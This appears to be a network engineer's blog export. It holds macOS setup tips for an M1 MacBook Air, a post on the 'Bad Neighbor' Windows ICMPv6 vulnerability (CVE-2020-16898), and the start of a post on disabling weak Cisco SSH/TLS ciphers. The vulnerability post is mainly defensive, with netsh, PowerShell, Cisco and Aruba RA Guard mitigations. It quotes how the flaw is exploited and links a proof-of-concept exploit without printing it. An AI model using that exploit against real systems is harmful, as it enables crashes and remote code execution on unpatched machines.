src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjA0SyNQqymaDlbs7oYbEXbLc4zRRniLC3qMVISu-oNZC4lS0GuFRk-u2vPqlg4ZgRgApl6bDEQntJRQjoWqdlv1dw1DRLs35lJWZLH2vkBg1BMjxYRi0ZR2KPo2b6UvZ3lNlsw_4MsGpUj/w491-h433/Black-Desktop.png" width="491" /></a></div><span><br /></span><p></p><p style="font-family: "Helvetica Neue"; font-stretch: normal; line-height: normal; margin: 0px; text-align: justify;"><span><br /></span></p><p style="font-family: "Helvetica Neue"; font-stretch: normal; line-height: normal; margin: 0px; text-align: justify;"> <b>S</b><b>creen Savers - set up Hot Corners </b></p><p style="font-family: "Helvetica Neue"; font-stretch: normal; line-height: normal; margin: 0px; text-align: justify;"><span> <span> </span><span>If you hold down the Option key while selecting a corner in Preferences then the corner isn't active unless you also hold down the </span></span>Option key. I use the Apple icon a lot and this prevents me from showing the desktop when I meant to show the icon.</p><p style="font-family: "Helvetica Neue"; font-stretch: normal; line-height: normal; margin: 0px;"> <span> </span></p><p style="font-family: "Helvetica Neue"; font-stretch: normal; line-height: normal; margin: 0px;"><br /></p><p style="font-family: "Helvetica Neue"; font-stretch: normal; line-height: normal; margin: 0px;"><span> <span> </span></span>Top Left - Option+Desktop</p><p style="font-family: "Helvetica Neue"; font-stretch: normal; line-height: normal; margin: 0px;"> <span> </span>Bottom Left - Mission Control</p><p style="font-family: "Helvetica Neue"; font-stretch: normal; line-height: normal; margin: 0px;"> <span> </span>Top Right - Notification Center</p><p style="font-family: "Helvetica Neue"; font-stretch: normal; line-height: normal; margin: 0px;"> <span> </span>Bottom Right - Launchpad</p><p style="font-family: "Helvetica Neue"; font-size: 13px; font-stretch: normal; line-height: normal; margin: 0px;"><br /></p><p style="font-family: "Helvetica Neue"; font-size: 13px; font-stretch: normal; line-height: normal; margin: 0px;"><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhO5T8WYf8RCmzypxtPJVtC-e7Ai18qdLWQ1Bmc9qYWXR6ES5DwL7oFPXTAkFMuusSf6fmgvzEIsEGbyUnXj4XqD59pHuSEddzyPJYhHqhaUvwFQZ3Q3O8zrDRVeusVnUp_VK5YPGeg5pjI/s694/HotCorners.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="189" data-original-width="694" height="132" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhO5T8WYf8RCmzypxtPJVtC-e7Ai18qdLWQ1Bmc9qYWXR6ES5DwL7oFPXTAkFMuusSf6fmgvzEIsEGbyUnXj4XqD59pHuSEddzyPJYhHqhaUvwFQZ3Q3O8zrDRVeusVnUp_VK5YPGeg5pjI/w486-h132/HotCorners.png" width="486" /></a></div><div><br /></div><h4 style="text-align: left;">Accessibility</h4><div><span>I like to be able to move windows with the trackpad so I enable dragging.</span></div><div><span> </span>Pointer Control, Trackpad Options</div><div> <span> <span> </span></span>Enable Dragging - three-finger drag</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj11VktVtieEau0z_M4Kb_6gLAemzFEceBIA4feYDa24m06coxN5sQ6J7XC8my1uJ0ke6SY2N5susjGfOgIH0A4NTNYIv9VS3vXaZkVSgBvs3KZLqmw3V7zUNjtM1Leez86P6y6-EwzB3tf/s1338/ThreeFingerDrag.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="980" data-original-width="1338" height="323" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj11VktVtieEau0z_M4Kb_6gLAemzFEceBIA4feYDa24m06coxN5sQ6J7XC8my1uJ0ke6SY2N5susjGfOgIH0A4NTNYIv9VS3vXaZkVSgBvs3KZLqmw3V7zUNjtM1Leez86P6y6-EwzB3tf/w442-h323/ThreeFingerDrag.png" width="442" /></a></div><br /><div><br /></div><div><br /></div><h4 style="text-align: left;">Dock and Menu Bar</h4><div>I like the dock to be smaller than the default and to auto-hide. I also like to have the menu bar at the top auto-hide. This is a personal preference and I find that most people don't like it. It's worth trying.</div><div><br /></div><div> Put a check in Magnification. Adjust the slider to suit. I like about 60%</div><div><span> Under Position on Screen, select Left.</span><br /></div><div> Put a check in Automatically hide and show the Dock</div><div> Menu Bar - Check Automatically hide and show the menu bar</div><div> </div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhneW0A2zyHqVSdRCVmtjszr-o0W85wQcCT0wYNTMK976EY-bOnpKzdmnlKtqliDWIHrqc0E4x59XjnKZ_Nehai1RsO-2py0Q7S9mTGs4CcImwoYXDYUbjBAi95xLIvY9Q3VKvZldRbMZ-/s1336/Dock-Menu.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1084" data-original-width="1336" height="359" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhneW0A2zyHqVSdRCVmtjszr-o0W85wQcCT0wYNTMK976EY-bOnpKzdmnlKtqliDWIHrqc0E4x59XjnKZ_Nehai1RsO-2py0Q7S9mTGs4CcImwoYXDYUbjBAi95xLIvY9Q3VKvZldRbMZ-/w442-h359/Dock-Menu.png" width="442" /></a></div><br /><div><br /></div><div><br /></div><div style="text-align: left;"><b>Do Not Disturb</b></div><div style="text-align: left;"><b><br /></b></div><div style="text-align: left;">In keeping with the minimum distraction, maximum productivity theme I want quick access to the Do Not Disturb options.</div><div style="text-align: left;"><br /></div><div><span> </span>Put a check in Show in Menu Bar and select Always</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiK2SGbkvN9w5HQjhC_Ga5PEtJsRl-hrHmfZNartSJ9wmDV532Ri-kXjGz6-dD9CwETGhEJpk3yecPd3KdxjrTD47sRFv8T79YCtdlDX7-KJzKzZGZtaNWA2pVxn64KmXgqnMivrW_eh_vd/s1336/DND.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1086" data-original-width="1336" height="361" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiK2SGbkvN9w5HQjhC_Ga5PEtJsRl-hrHmfZNartSJ9wmDV532Ri-kXjGz6-dD9CwETGhEJpk3yecPd3KdxjrTD47sRFv8T79YCtdlDX7-KJzKzZGZtaNWA2pVxn64KmXgqnMivrW_eh_vd/w444-h361/DND.png" width="444" /></a></div><br /><div><br /></div><div> </div><div>Keyboard Brightness</div><div> Put a check in Show in Menu Bar</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFPmy33TyPSK6vF06Hib3LTMCuAuXgqFSOOHjX4_cj38ZkZP74bQBdPIpsAOusGPZfOwf9ota1bJwRFanuZUkqMjIQLUIWm5Vo7q8CNMyUiB5itrgHcQqY82TViGzkgKabC4SxS0ffAtDr/s1336/KeyboardBright.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1088" data-original-width="1336" height="354" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFPmy33TyPSK6vF06Hib3LTMCuAuXgqFSOOHjX4_cj38ZkZP74bQBdPIpsAOusGPZfOwf9ota1bJwRFanuZUkqMjIQLUIWm5Vo7q8CNMyUiB5itrgHcQqY82TViGzkgKabC4SxS0ffAtDr/w434-h354/KeyboardBright.png" width="434" /></a></div><br /><div><br /></div><div><br /></div><div> Battery</div><div> Put a check in Show Percentage</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT1Qllf-wT7OEP2jOvzApBUeIFnvoPpcGqlJ3OnQ9H168CZwT2EM3MKvR_E7fEgdAWJf7xUEpJVqCRMGfsy3H5eSMnIqk7XPs3pzjmL1_UhKgkYuAqYK9Td5OsCazMD2Opj3XVSYgWXSdT/s780/Battery.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="654" data-original-width="780" height="427" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT1Qllf-wT7OEP2jOvzApBUeIFnvoPpcGqlJ3OnQ9H168CZwT2EM3MKvR_E7fEgdAWJf7xUEpJVqCRMGfsy3H5eSMnIqk7XPs3pzjmL1_UhKgkYuAqYK9Td5OsCazMD2Opj3XVSYgWXSdT/w510-h427/Battery.png" width="510" /></a></div><br /><div><br /></div><div><br /></div><div><b> Clock </b></div><div style="text-align: justify;"><span> </span>Most users won't want my clock settings. I prefer 24-hour format so that there is no confusion between 06:00AM and 6:00PM. I am also fanatical about using a stopwatch and I want to see seconds. It drives me crazy that on the iPhone the clock app has no option to display seconds. </div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><span> </span>If anyone is interested, it takes me on average 29 seconds from when I turn the ignition off until I am pumping gas at Costco. I have done 27 seconds, and occasionally 30 seconds. (Update - Costco now has the Tap to Pay on the pumps. It has cut 5 seconds off my time.)</div><div><br /></div><div><span> </span>Finally, with my ADHD I can lose all track of time and work on a task for far too long, so the Mac announces the time every 15 minutes.</div><div> </div><div><span> <span> </span></span>Put a check in Use 24 hour clock</div><div> <span> </span>Put a check in Flash the time separators</div><div> <span> </span>Put a check in Display the time with seconds</div><div> <span> </span>Put a check in Announce the time</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJVnkysw3c4Ur6wSxkqv8I_ZAB9JKfXzvyHouFaTf1_djhvq1zfnfXaDapjmNRO0FQeqmDUF8Tvl64Pz7OTmJL-ZQ0NM3o7aqZcG8USMBuTETyCDTGdnCOYRqMvneJdQsywdZrn_MvyovT/s1338/Clock.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1082" data-original-width="1338" height="391" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJVnkysw3c4Ur6wSxkqv8I_ZAB9JKfXzvyHouFaTf1_djhvq1zfnfXaDapjmNRO0FQeqmDUF8Tvl64Pz7OTmJL-ZQ0NM3o7aqZcG8USMBuTETyCDTGdnCOYRqMvneJdQsywdZrn_MvyovT/w483-h391/Clock.png" width="483" /></a></div><br /><div><br /></div><h4 style="text-align: left;">Dock</h4><h4 style="text-align: left;"><span style="font-weight: normal;"><span> Apple includes a lot of apps on the dock. I find that I don't use many of the built-in apps so I removed the ones I don't expect to use</span></span><span style="font-weight: normal;">. To do that:</span></h4><p> <span> </span>Right-click, select Options, Remove from Dock.</p><p><br /></p><h4 style="text-align: left;">View menu</h4><p><span> Switch to the Finder app. In the Menu Bar, click on View </span></p><p><span><span> </span>Put a check in </span>use stacks. This organizes the files on the desktop into neat folders. You can uncheck to quickly go back to showing individual files.</p><p> <span> Click on </span>Show Path bar, and show status bar</p><p><b>Customize the toolbar</b></p><p>While in the view menu, click on Customize Toolbars...</p><p>I added "Get Info" to the bar and changed "Show" to text and Icon.</p><p><br /></p><p><br /></p><h4 style="text-align: left;">Finder</h4><p>With Finder as the active app, click Finder, Preferences in the menu bar. Click the Advanced tab and put a check in "Show all file extensions in Finder". This prevents a malicious file from hiding its true extension.</p><p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgW5bsdpORJfiYEGkxmrJrhHU3Fn4vyKnB9YlcqAmUI8PAP0sijHspY0_px8oOScVomcmSFGe1ManrlOyAVHyoSQDwcxtVjv4CmQxjEycjRsR9SmvrzU9ZX9o9jnqKfmzrbPY5HAaD8zNlP/s764/Finder-Prefs.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="764" data-original-width="754" height="411" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgW5bsdpORJfiYEGkxmrJrhHU3Fn4vyKnB9YlcqAmUI8PAP0sijHspY0_px8oOScVomcmSFGe1ManrlOyAVHyoSQDwcxtVjv4CmQxjEycjRsR9SmvrzU9ZX9o9jnqKfmzrbPY5HAaD8zNlP/w406-h411/Finder-Prefs.png" width="406" /></a></div><br /><p>One tip for Finder. In the Toolbar, there is a Group tool. If you have mixed file types in a folder it's very convenient to group by Application.<br /><br /><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmMaxfs_hjzO00d6488A8RWG-4OlhyAydBzEVKZU6fvvwLVorbpJIgvNzFjpTCJ77RUbUx-4508ZwWf_2rBI1TntsJgpyY-M-kaCna22vw115VNIct7yRhhA2tTRx3-X7bLRHMNZCNDhJX/s942/Screen+Shot+2021-04-17+at+10.52.59.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="942" data-original-width="724" height="437" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmMaxfs_hjzO00d6488A8RWG-4OlhyAydBzEVKZU6fvvwLVorbpJIgvNzFjpTCJ77RUbUx-4508ZwWf_2rBI1TntsJgpyY-M-kaCna22vw115VNIct7yRhhA2tTRx3-X7bLRHMNZCNDhJX/w336-h437/Screen+Shot+2021-04-17+at+10.52.59.png" width="336" /></a></div><div><br /></div><h4 style="text-align: left;">Tips on sorting in Finder</h4></div><div><a href="https://support.apple.com/guide/mac-help/sort-and-arrange-items-in-the-finder-on-mac-mchlp1745/12.0/mac/12.0">Sort and arrange items in the Finder on Mac</a></div><div><br /><h3 style="text-align: left;">Safari</h3><p><a href="https://support.apple.com/guide/safari/cpsh003/14.0/mac/11.2.2">Keyboard shortcuts and gestures in Safari on Mac</a><br /></p><p>Open Safari Preferences</p><p><b>General</b></p><p> <b>Uncheck Open "Safe" files after downloading.</b> This a personal OpSec issue. I don't like for files that I download from the Internet to be opened automatically.</p><p> <b>New windows open with: Empty Page</b> - I don't like to wait for a new window to load a page that I probably won't be using.</p><p> <b>New tabs open with: Empty Page</b></p><p></p><div class="separator" style="clear: both; text-align: center;"><br /></div><br /><div class="separator" style="clear: both; text-align: center;"><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzSgG3m72Xsu905DOJ2uYzisqC-Qevb6fH1SA_y91epHOcpbY35ZIOKx1b2cZTO8e94XMUSry1BBg3G2ferNscK9Zkaj81rf7iOR14EJCQB89ZklN-1Eo1_8JX_uFKMmkx5OV4umBLaqbP/s919/Safari.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="559" data-original-width="919" height="349" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzSgG3m72Xsu905DOJ2uYzisqC-Qevb6fH1SA_y91epHOcpbY35ZIOKx1b2cZTO8e94XMUSry1BBg3G2ferNscK9Zkaj81rf7iOR14EJCQB89ZklN-1Eo1_8JX_uFKMmkx5OV4umBLaqbP/w571-h349/Safari.png" width="571" /></a></div></div><b><br /></b><p></p><p><b><span> </span>Advanced</b></p><p></p><ul style="text-align: left;"><li> Put a check in Show Develop menu in the menu bar.</li><li> Put a check in Show Full Website Address</li></ul><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiOdtXfLto986HFaDUsMTnNQz_fKpmIk4Hq7TZhNLjDTvXA1VGZBBLi6aGfeQL4C1iLtsEEgX46vRqo3pW1dEDVY0D5pWQSEXEESayod5pLLeVqKyG8jS4NaVsBAtew7_oY5MQL6ZN8Z04/s1616/Safari-Adv.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="830" data-original-width="1616" height="270" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiOdtXfLto986HFaDUsMTnNQz_fKpmIk4Hq7TZhNLjDTvXA1VGZBBLi6aGfeQL4C1iLtsEEgX46vRqo3pW1dEDVY0D5pWQSEXEESayod5pLLeVqKyG8jS4NaVsBAtew7_oY5MQL6ZN8Z04/w527-h270/Safari-Adv.png" width="527" /></a></div><br /><p><br /></p><p><b>Extensions</b></p><p>I haven't used Safari as my daily driver before but I'm going to give it a go on the M1 since it's highly optimized for ARM and should give me the best battery life. I can see that I will have to give up some extensions that I am used to on Firefox like vertical tabs, UBlock Origin, Ghostery, etc. but if I get 12 hours of battery life it's a good trade-off.</p><p>To install extensions, click Safari in the menu bar, then Safari extensions... to locate extensions for Safari. Similar to Chrome, Firefox, and Edge, Safari extensions are now in the App Store. </p><p><br /></p><p><b>Grammarly</b></p><p>This is a grammar-checking extension. There are versions for Chrome, Firefox, Safari. You will have to create a free account and login to start using Grammarly. I highly recommend it. If you pay for a subscription you can run Grammarly in Microsoft apps.</p><p><b><br /></b></p><p><b>LastPass </b></p><p>Open Safari and click the link below to go to the Logmein download site.</p><p><a href="https://support.logmeininc.com/lastpass/help/how-do-i-install-the-safari-app-extension-on-my-mac-Ip010097">How do I install the Safari app extension on my mac</a></p><p></p><ul style="text-align: left;"><li>Download the lastpass.dmg file.</li><li>Double click on the dmg, when it opens, drag it into the applications folder.</li><li>Double click to start it and log in.</li><li>Back in Safari.</li><li>Preferences, Extensions, enable the lastpass extension.</li></ul><p></p><p><br /></p><p><b>Buffer</b></p><p>This is an extension that lets you tweet from Safari. I find it handy when I find an info sec site that I want to share.</p><p>Open the App Store, click on Catagories, Safari Extensions. In the search bar enter buffer. You will see Buffer: Social Media Composer.</p><p>Click on Get, Install.</p><p><br /></p><h3 style="text-align: left;">Activity monitor </h3><p><span> </span>Add a column for architecture. This lets you see which apps are running native and which are still Intel.</p><p><br /></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiko87hIVFrhzs-FlQazCPQSn6ACMW5-NntnOI_8u_Umn7gm4yR8c3KALJlvLL_JTMDgSULVLYk6zvoF8tJu3FJfKfZ-ZiC6fzigKzTholro1-PKZIp0Qy3-f5xxALM5_FAZW3wRtG_XGmO/s1064/Activity-Mon.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="211" data-original-width="1064" height="120" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiko87hIVFrhzs-FlQazCPQSn6ACMW5-NntnOI_8u_Umn7gm4yR8c3KALJlvLL_JTMDgSULVLYk6zvoF8tJu3FJfKfZ-ZiC6fzigKzTholro1-PKZIp0Qy3-f5xxALM5_FAZW3wRtG_XGmO/w609-h120/Activity-Mon.png" width="609" /></a></div><br /> <p></p><h3 style="text-align: left;">Time Machine</h3><p>macOS includes a decent backup application called Time Machine. Since network engineers tend to install a lot of software from Github and other Internet locations, having a full backup is important. There are 3rd party tools like Carbon Copy Cloner and SuperDuper that have a lot more features. At the time of this blog (4-15-2021) SuperDuper hadn't been updated to work with the M1. </p><p>I downloaded the Carbon Copy Cloner trial and it worked with the M1. The Caveat is that it can't make a bootable back. The work around is to install Big Sur manually and then restore. I think for the short term I'm going to stick with Time Machine. The snap shot feature of Carbon Copy Cloner shoulds good but I'm not sure I need it.</p><p>At a minimum, you should get Time Machine setup.</p><p>Also, I still use a Windows laptop when I'm at the office. If it got crypto locked all of my Dropbox and Goggle Drive files would get overwritten with encrypted versions. Having an offline backup is a necessity if you interact with Windows.</p><p>I bought a Elecife M.2 NVME PCIe SATA NGFF SSD Enclosure and a Western Digital 1TB WD Blue SN550 NVMe drive to hold the backups. The enclosure is very nice, tool-free, and lightweight. Not like the old days of using a 2.5" spinning hard drive in an external enclosure. </p><p>As soon as I connected it, Time Machine opened and asked if I wanted to use it. After that, it does a backup every hour and saves weekly and monthly backups. I don't carry the drive with me so I don't do the hourly. I usually just connected it in the evening and let it do one or two backups. </p><p>The NVME is so fast that the backups only take a few minutes. </p><p>I noticed that my .zshrc file wasn't visible in the backup. Use "shift+cmd+." to show hidden files. </p><p><b>Reference</b></p><p><a href="https://support.apple.com/en-us/HT201250">Back up your Mac with Time Machine</a><br /></p><p><b><br /></b></p><p><b>Wrap Up</b></p><p>That does it for the basic setup of the OS. In the next post, I will dive into installing the tools a network engineer needs.</p><div style="text-align: left;">You can find Part Two <a href="https://mwhubbard.blogspot.com/2021/03/apple-macbook-air-m1-for-network_15.html">here<br /></a>You can find Part Three <a href="https://mwhubbard.blogspot.com/2021/03/apple-macbook-air-m1-for-network_77.html">here</a></div><p><br /></p></div>@rikosintiehttp://www.blogger.com/profile/12290070565813241791noreply@blogger.com4tag:blogger.com,1999:blog-690329124282786689.post-73506723177489886652020-10-25T16:08:00.004-07:002020-10-26T09:28:56.738-07:00Bad Neighbor cve-2020-16898<p>On October 13, 2020 Microsoft issued a security vulnerability notice - Windows TCP/IP Remote Code Execution Vulnerability. <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898" target="_blank">CVE-2020-16898</a> which affects Server 2019 and Windows 10.</p><p>From the notice:</p><p>"A remote code execution vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets. An attacker who successfully exploited this vulnerability could gain the ability to execute code on the target server or client.</p><p>To exploit this vulnerability, an attacker would have to send specially crafted ICMPv6 Router Advertisement packets to a remote Windows computer.</p><p>The update addresses the vulnerability by correcting how the Windows TCP/IP stack handles ICMPv6 Router Advertisement packets."</p><p>This is an unauthenticated vulnerability meaning you don't need any credentials on the domain to exploit it. A security researcher named Adam wrote a Proof of Concept exploit in python. The write up is extremely detailed and walks you through his development. The blog is available here - <a href="http://blog.pi3.com.pl/?p=780" target="_blank">CVE-2020-16898 – Exploiting “Bad Neighbor” vulnerability</a> The python script needed to exploit the vulnerability is available on the blog.</p><h2 style="text-align: left;">Mitigation</h2><p>Microsoft does not recommend completely disabling IPv6 to mitigate. As a workaround, they provide this netsh script</p><p>Disable ICMPv6 RDNSS</p><div style="text-align: left;"><br /></div><p>
<!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">netsh</span> <span style="color: white;">int</span> <span style="color: white;">ipv6</span> <span style="color: white;">set</span> <span style="color: white;">int</span> <span style="color: white;">*INTERFACENUMBER*</span> <span style="color: white;">rabaseddnsconfig=disable</span>
</pre></div>
<p>To find the interface number I found this Powershell script <a href="https://github.com/pdq/Bonus-Content/blob/master/Bad%20Neighbor/Deploydisable.ps1" target="_blank">Enumerate IPv6 interfaces</a></p><p>The same GitHub has a script to disable RDNSS.</p><p>Example - I ran this from the Powershell ISE program:</p><p>
<!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">PS</span> <span style="color: white;">C:</span>\<span style="color: white;">Windows</span>\<span style="color: white;">system32></span> <span style="color: white;">Get-NetIPInterface</span> <span style="color: white;">-AddressFamily</span> <span style="color: white;">ipv6</span> <span style="color: white;">|</span> <span style="color: white;">foreach{</span>
<span style="color: white;">[PSCustomObject]@{</span>
<span style="color: #0086d2;">"IfIndex"</span> <span style="color: white;">=</span> <span style="color: white;">(&</span> <span style="color: white;">netsh</span> <span style="color: white;">int</span> <span style="color: white;">ipv6</span> <span style="color: white;">show</span> <span style="color: white;">int</span> <span style="color: white;">$_.ifIndex)</span> <span style="color: white;">-match</span> <span style="color: #0086d2;">'IfIndex'</span> <span style="color: white;">-replace</span> <span style="color: #0086d2;">"ifindex\s*:"</span><span style="color: white;">,</span><span style="color: #0086d2;">""</span> <span style="color: white;">|</span> <span style="color: white;">Out-String</span>
<span style="color: #0086d2;">"RFC"</span> <span style="color: white;">=</span> <span style="color: white;">(&</span> <span style="color: white;">netsh</span> <span style="color: white;">int</span> <span style="color: white;">ipv6</span> <span style="color: white;">show</span> <span style="color: white;">int</span> <span style="color: white;">$_.ifIndex)</span> <span style="color: white;">-match</span> <span style="color: #0086d2;">'(RFC 6106)'</span> <span style="color: white;">-replace</span> <span style="color: #0086d2;">"RA Based DNS Config \(RFC 6106\)\s*:"</span><span style="color: white;">,</span><span style="color: #0086d2;">""</span> <span style="color: white;">|</span> <span style="color: white;">Out-String</span>
<span style="color: white;">}</span>
<span style="color: white;">}</span>
<span style="color: white;">IfIndex</span> <span style="color: white;">RFC</span>
<span style="color: white;">-------</span> <span style="color: white;">---</span>
<span style="color: #0086f7; font-weight: bold;">5.</span><span style="color: white;">..</span> <span style="color: white;">enable...</span>
<span style="color: #0086f7; font-weight: bold;">6.</span><span style="color: white;">..</span> <span style="color: white;">enable...</span>
<span style="color: #0086f7; font-weight: bold;">1.</span><span style="color: white;">..</span> <span style="color: white;">enable...</span>
<span style="color: white;">PS</span> <span style="color: white;">C:</span>\<span style="color: white;">Windows</span>\<span style="color: white;">system32></span> <span style="color: white;">netsh</span> <span style="color: white;">int</span> <span style="color: white;">ipv6</span> <span style="color: white;">set</span> <span style="color: white;">int</span> <span style="color: #0086f7; font-weight: bold;">5</span> <span style="color: white;">rabaseddnsconfig=disable</span>
<span style="color: white;">Ok.</span>
</pre></div>
<h3 style="text-align: left;"><br /></h3><h3 style="text-align: left;">Mitigation using a Cisco network switch</h3><p>If you are using Cisco switches in your environment you can use the following to mitigate. I show this in the video.</p><p>From global configuration mode:</p><p></p><ul style="text-align: left;"><li>SW1(config)#ipv6 nd inspection policy policy-name HOST-POLICY</li><li>SW1(config-nd-inspection)#device-role host</li></ul><div>Note: host is the default role so you don't have to enter the device-role.</div><p></p><p>From interface configuration mode</p><p></p><ul style="text-align: left;"><li>SW1(config)#int gig0/1</li><li>SW1(config-if)#ipv6 nd raguard attach-policy HOST-POLICY</li></ul><p></p><p><b>Verify</b></p><p>SW1#sh ipv6 nd raguard policy HOST-POLICY</p><p>Policy RAGUARD configuration:</p><p>device-role host</p><p>Policy HOST-POLICY is applied on the following targets:</p><p>Target Type Policy Feature Target range</p><p>Gi0/1 PORT RAGUARD RA guard vlan all</p><p><br /></p><h3 style="text-align: left;">Mitigation using an Aruba switch running Provision software</h3><p>In this example, an Aruba 5412 switch is used</p>sw2(config)# ipv6 ra-guard ports i1 log<div><b><br /></b></div><div><b>Verify</b></div><div><div>sw2# show ipv6 ra-guard | exclude No 0</div><div><br /></div><div> IPv6 RA Guard Information</div><div><br /></div><div> Port Block RAs Blocked Redirs Blocked Log</div><div> ----- ----- ----------- -------------- ---</div><div> I1 Yes 0 0 Yes</div><div><div><br /></div></div></div><div><h3 style="text-align: left;"><br /></h3><h3 style="text-align: left;">Watch Bad Neighbor in action</h3><p>I made a 2-minute video showing a Windows 2019 server blue screening when Adam's script is run against the server. After showing the blue screen I enable ra guard on a cisco switch and rerun the script. This prevents the blue screen. Here is a link to the video - <a href="https://youtu.be/_-bbMcrsuCU" target="_blank">Bad Neighbor cve 2020 16898</a>. </p><h3 style="text-align: left;">Juniper network devices</h3><p>Juniper has announced that JunOS is vulnerable under certain conditions. Here is their bulletin:</p><p><a href="https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11049&cat=SIRT_1&actp=LIST" target="_blank">2020-10 Security Bulletin: Junos OS:</a><br /></p><p><br /></p><h3 style="text-align: left;">References</h3><p><a href="https://isc2.sans.org/forums/diary/CVE202016898+Windows+ICMPv6+Router+Advertisement+RRDNS+Option+Remote+Code+Execution+Vulnerability/26684" target="_blank"> CVE-2020-16898: Windows ICMPv6 Router Advertisement RRDNS Option Remote Code Execution Vulnerability</a> - A detailed write up by Johannes Ulrich of SANS.<br /></p><p><a href="https://community.cisco.com/t5/networking-documents/ipv6-ra-guard/ta-p/3124519" target="_blank">Cisco RA Guard blog</a><br /></p><p><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16898" target="_blank">MITRE CVE for 2020-16898</a><br /></p><p><a href="https://github.com/corelight/CVE-2020-16898" target="_blank">ZEEK package to detect Bad Neighbor</a><br /></p><p><a href="https://blog.rapid7.com/2020/10/14/there-goes-the-neighborhood-dealing-with-cve-2020-16898-a-k-a-bad-neighbor/" target="_blank">There Goes The Neighborhood</a> - Rapid 7 blog on Bad Neighborhood<br /></p><p></p></div>@rikosintiehttp://www.blogger.com/profile/12290070565813241791noreply@blogger.com1tag:blogger.com,1999:blog-690329124282786689.post-33563345220352392020-06-21T18:09:00.005-07:002022-04-22T12:32:22.363-07:00Disable Weak SSH/SSL Ciphers in Cisco IOSFor backward compatibility, most companies still ship deprecated, weak SSH, and SSL ciphers. Cisco is no exception. For the security of your network and to pass a penetration test you need to disable the weak ciphers, disable SSH v1 and disable TLS versions 1.0 and 1.1.<br />
<br />
Firefox, Chrome and Microsoft all have committed to dropping support for TLS1.1. Firefox had actually done it in May 2020 but so many US Government sites quit working (during the Covid19 Hysteria) that they rolled back. Microsoft has set July 2020 to remove TLS 1.0/1.1 from IE, Edge Legacy, and Edge Chromium.<br />
<br />
This blog covers Cisco IOS software. I plan to do another blog on IOS-XE and Nexus in the future.<br />
<br />Cisco has this document listing the <a href="https://www.cisco.com/c/en/us/support/docs/security-vpn/ipsec-negotiation-ike-protocols/116055-technote-ios-crypto.html">Next Generation Encryption</a> that is supported. <div><br /></div><div>For IOS-XE, this <a href="https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/d1/sec-d1-cr-book/sec-cr-i3.html#wp8992713530">document</a> has a lot of detail. Search for "ip ssh"</div><div><br />
<h3>
SSH</h3>
Network device manufacturers (all of them I think) enabling SSH v1 by default really bothers me. Most Windows users connect with Putty which supports SSH v2. You should set Putty to default to SSH V2:<br />
<br />
